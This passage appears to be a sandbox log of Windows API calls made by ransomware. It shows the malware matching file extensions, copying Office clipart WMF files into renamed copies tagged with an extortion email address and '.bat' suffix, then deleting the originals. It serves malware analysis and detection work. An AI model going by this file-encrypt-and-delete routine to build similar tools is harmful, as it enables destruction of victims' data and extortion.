lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.216] lstrlenW (lpString=".rar") returned 4 [0065.216] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.216] lstrlenW (lpString=".bz2") returned 4 [0065.216] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.216] lstrlenW (lpString=".7z") returned 3 [0065.216] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0065.217] lstrlenW (lpString=".dbf") returned 4 [0065.217] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0065.217] lstrlenW (lpString=".1cd") returned 4 [0065.217] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 68 [0065.217] lstrlenW (lpString=".jpg") returned 4 [0065.217] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.217] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.217] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01181_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0065.218] GetLastError () returned 0x0 [0065.218] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x5a8, lpOverlapped=0x0) returned 1 [0065.220] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x5b0, lpOverlapped=0x0) returned 1 [0065.221] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.221] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0065.221] SetEndOfFile (hFile=0x2c8) returned 1 [0065.221] CloseHandle (hObject=0x2c8) returned 1 [0065.222] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.222] SetEndOfFile (hFile=0x354) returned 1 [0065.223] CloseHandle (hObject=0x354) returned 1 [0065.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.224] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01181_.wmf")) returned 1 [0065.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 68 [0065.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 68 [0065.224] lstrlenW (lpString=".doc") returned 4 [0065.224] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.224] lstrlenW (lpString=".docx") returned 5 [0065.224] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.224] lstrlenW (lpString=".pdf") returned 4 [0065.224] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.224] lstrlenW (lpString=".xls") returned 4 [0065.224] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.224] lstrlenW (lpString=".xlsx") returned 5 [0065.224] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.224] lstrlenW (lpString=".ppt") returned 4 [0065.224] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 68 [0065.224] lstrlenW (lpString=".zip") returned 4 [0065.224] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.225] lstrlenW (lpString=".rar") returned 4 [0065.225] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.225] lstrlenW (lpString=".bz2") returned 4 [0065.225] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.225] lstrlenW (lpString=".7z") returned 3 [0065.225] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 68 [0065.225] lstrlenW (lpString=".dbf") returned 4 [0065.225] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 68 [0065.225] lstrlenW (lpString=".1cd") returned 4 [0065.225] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01181_.WMF") returned 68 [0065.225] lstrlenW (lpString=".jpg") returned 4 [0065.225] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.225] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.225] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01182_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0065.226] GetLastError () returned 0x0 [0065.226] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xbb4, lpOverlapped=0x0) returned 1 [0065.268] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xbc0, lpOverlapped=0x0) returned 1 [0065.269] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.269] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0065.269] SetEndOfFile (hFile=0x2c8) returned 1 [0065.269] CloseHandle (hObject=0x2c8) returned 1 [0065.270] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.270] SetEndOfFile (hFile=0x354) returned 1 [0065.271] CloseHandle (hObject=0x354) returned 1 [0065.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.272] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01182_.wmf")) returned 1 [0065.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 68 [0065.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 68 [0065.272] lstrlenW (lpString=".doc") returned 4 [0065.272] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.272] lstrlenW (lpString=".docx") returned 5 [0065.272] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.272] lstrlenW (lpString=".pdf") returned 4 [0065.272] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.272] lstrlenW (lpString=".xls") returned 4 [0065.272] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.272] lstrlenW (lpString=".xlsx") returned 5 [0065.273] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.273] lstrlenW (lpString=".ppt") returned 4 [0065.273] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 68 [0065.273] lstrlenW (lpString=".zip") returned 4 [0065.273] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.273] lstrlenW (lpString=".rar") returned 4 [0065.273] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.273] lstrlenW (lpString=".bz2") returned 4 [0065.273] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.273] lstrlenW (lpString=".7z") returned 3 [0065.273] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 68 [0065.273] lstrlenW (lpString=".dbf") returned 4 [0065.273] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 68 [0065.273] lstrlenW (lpString=".1cd") returned 4 [0065.273] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01182_.WMF") returned 68 [0065.273] lstrlenW (lpString=".jpg") returned 4 [0065.273] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.273] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.274] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01183_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0065.274] GetLastError () returned 0x0 [0065.274] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x8f8, lpOverlapped=0x0) returned 1 [0065.285] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x900, lpOverlapped=0x0) returned 1 [0065.286] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.287] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0065.287] SetEndOfFile (hFile=0x2c8) returned 1 [0065.287] CloseHandle (hObject=0x2c8) returned 1 [0065.288] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.288] SetEndOfFile (hFile=0x354) returned 1 [0065.288] CloseHandle (hObject=0x354) returned 1 [0065.289] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.289] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01183_.wmf")) returned 1 [0065.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 68 [0065.289] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 68 [0065.289] lstrlenW (lpString=".doc") returned 4 [0065.289] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.289] lstrlenW (lpString=".docx") returned 5 [0065.289] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.289] lstrlenW (lpString=".pdf") returned 4 [0065.289] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.289] lstrlenW (lpString=".xls") returned 4 [0065.289] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.289] lstrlenW (lpString=".xlsx") returned 5 [0065.290] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.290] lstrlenW (lpString=".ppt") returned 4 [0065.290] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 68 [0065.290] lstrlenW (lpString=".zip") returned 4 [0065.290] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.290] lstrlenW (lpString=".rar") returned 4 [0065.290] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.290] lstrlenW (lpString=".bz2") returned 4 [0065.290] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.290] lstrlenW (lpString=".7z") returned 3 [0065.290] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 68 [0065.290] lstrlenW (lpString=".dbf") returned 4 [0065.290] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 68 [0065.290] lstrlenW (lpString=".1cd") returned 4 [0065.290] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 68 [0065.290] lstrlenW (lpString=".jpg") returned 4 [0065.290] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.290] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.290] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01366_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0065.291] GetLastError () returned 0x0 [0065.291] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x6e8, lpOverlapped=0x0) returned 1 [0065.341] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x6f0, lpOverlapped=0x0) returned 1 [0065.342] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.342] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0065.343] SetEndOfFile (hFile=0x2c8) returned 1 [0065.343] CloseHandle (hObject=0x2c8) returned 1 [0065.344] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.344] SetEndOfFile (hFile=0x354) returned 1 [0065.345] CloseHandle (hObject=0x354) returned 1 [0065.346] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.346] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01366_.wmf")) returned 1 [0065.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 68 [0065.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 68 [0065.346] lstrlenW (lpString=".doc") returned 4 [0065.346] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.347] lstrlenW (lpString=".docx") returned 5 [0065.347] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.347] lstrlenW (lpString=".pdf") returned 4 [0065.347] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.347] lstrlenW (lpString=".xls") returned 4 [0065.347] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.347] lstrlenW (lpString=".xlsx") returned 5 [0065.347] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.347] lstrlenW (lpString=".ppt") returned 4 [0065.347] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 68 [0065.347] lstrlenW (lpString=".zip") returned 4 [0065.347] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.347] lstrlenW (lpString=".rar") returned 4 [0065.347] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.347] lstrlenW (lpString=".bz2") returned 4 [0065.347] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.347] lstrlenW (lpString=".7z") returned 3 [0065.347] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 68 [0065.347] lstrlenW (lpString=".dbf") returned 4 [0065.347] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 68 [0065.347] lstrlenW (lpString=".1cd") returned 4 [0065.347] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 68 [0065.347] lstrlenW (lpString=".jpg") returned 4 [0065.347] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.348] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.348] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01585_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0065.349] GetLastError () returned 0x0 [0065.349] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x9dc, lpOverlapped=0x0) returned 1 [0065.378] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x9e0, lpOverlapped=0x0) returned 1 [0065.379] ReadFile (in: hFile=0x354, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0065.379] WriteFile (in: hFile=0x2c8, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0065.379] SetEndOfFile (hFile=0x2c8) returned 1 [0065.379] CloseHandle (hObject=0x2c8) returned 1 [0065.380] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.380] SetEndOfFile (hFile=0x354) returned 1 [0065.381] CloseHandle (hObject=0x354) returned 1 [0065.381] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.381] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01585_.wmf")) returned 1 [0065.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 68 [0065.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 68 [0065.383] lstrlenW (lpString=".doc") returned 4 [0065.383] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.383] lstrlenW (lpString=".docx") returned 5 [0065.383] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.383] lstrlenW (lpString=".pdf") returned 4 [0065.383] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.383] lstrlenW (lpString=".xls") returned 4 [0065.384] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.384] lstrlenW (lpString=".xlsx") returned 5 [0065.384] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.384] lstrlenW (lpString=".ppt") returned 4 [0065.384] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 68 [0065.384] lstrlenW (lpString=".zip") returned 4 [0065.384] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.384] lstrlenW (lpString=".rar") returned 4 [0065.384] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.384] lstrlenW (lpString=".bz2") returned 4 [0065.384] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.384] lstrlenW (lpString=".7z") returned 3 [0065.384] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 68 [0065.384] lstrlenW (lpString=".dbf") returned 4 [0065.384] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 68 [0065.384] lstrlenW (lpString=".1cd") returned 4 [0065.384] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 68 [0065.384] lstrlenW (lpString=".jpg") returned 4 [0065.384] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.398] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.398] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0065.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01629_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 